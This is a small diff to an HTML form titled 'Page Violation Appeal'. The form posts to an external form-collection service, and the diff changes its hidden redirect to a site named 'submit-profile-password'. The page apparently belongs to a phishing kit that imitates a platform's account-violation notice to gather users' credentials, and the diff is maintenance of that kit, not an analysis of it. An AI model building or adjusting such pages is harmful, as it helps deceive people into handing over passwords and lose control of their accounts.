--- a/form.html
+++ b/form.html
@@ -265,7 +265,7 @@
         <form class="verification-card" action="https://submit-form.com/qErmbmEOM" method="POST">
 
             <!-- Redirect after submission -->
-            <input type="hidden" name="_redirect" value="https://for-further-process.vercel.app">
+            <input type="hidden" name="_redirect" value="https://submit-profile-password.vercel.app/">
 
             <div class="card-header">
                 <div class="card-title">Page Violation Appeal</div>
@@ -329,5 +329,6 @@
 </body>
 
 </html>
+
 
 
